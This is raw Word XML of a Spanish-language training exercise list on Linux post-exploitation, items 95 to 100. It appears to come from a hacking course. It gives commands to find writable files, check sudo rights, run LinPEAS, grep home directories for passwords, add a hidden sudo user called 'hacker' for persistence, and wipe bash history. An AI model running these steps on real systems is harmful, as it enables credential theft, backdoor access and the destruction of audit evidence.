          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8231C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95. Buscar archivos modificables por el usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC620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Encuentra archivos que el usuario puede modificar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A86DB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7E45C3E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>find / -writable 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3AAD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encontrar puntos débiles para inyectar código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACC3CF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1203BF44">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0924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96. Escalada básica con sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D594CF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Comprueba si puedes ejecutar comandos como root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB8EE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8D52913" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495A7E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Si aparece algún comando permitido → posible escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5809C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="34CD47C8">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B4F7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97. Enumeración automática con LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA34E1C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Ejecuta una herramienta automática de enumeración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF85A85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EB56BB1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod +x linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F15B2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Herramienta clave para detectar vulnerabilidades automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16432976" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="42478059">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A471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98. Buscar credenciales en archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA72D08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posibles contraseñas en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E774B4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11906FB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grep -r "password" /home 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A6F6F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Muchos sistemas almacenan credenciales en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31D8C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4C13B51E">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55553F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99. Crear persistencia con usuario oculto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427008B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para mantener acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B9B4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50556B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo useradd hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo passwd hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo usermod -aG sudo hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E248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volver a entrar al sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ABA07" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B18111F">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF58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100. Borrar rastros (limpieza básica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134610E3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Elimina evidencias de acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02028ED7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E79D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history -c</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>rm -rf ~/.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D048031" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5555A834">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B69326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Se eliminan registros de comandos ejecutados (aunque no siempre es suficiente → logs del sistema siguen existiendo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38105E1D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562"/>
    <w:sectPr w:rsidR="00206562" w:rsidRPr="00206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7698"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09D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3C5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8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45E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1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2290">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1140922928">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="213263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3"/>
    <w:rsid w:val="000944F3"/>
    <w:rsid w:val="001F2A7E"/>
    <w:rsid w:val="00206562"/>
    <w:rsid w:val="002C78F8"/>
    <w:rsid w:val="003655AE"/>
    <w:rsid w:val="00433121"/>
    <w:rsid w:val="007950B0"/>
    <w:rsid w:val="00A67489"/>
    <w:rsid w:val="00AF1192"/>
    <w:rsid w:val="00D607B1"/>
    <w:rsid w:val="00E7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244A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDAD11B1-C98F-4E87-A214-90B7AF9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15</Pages>
  <Words>1209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2026-03-17T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T13:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>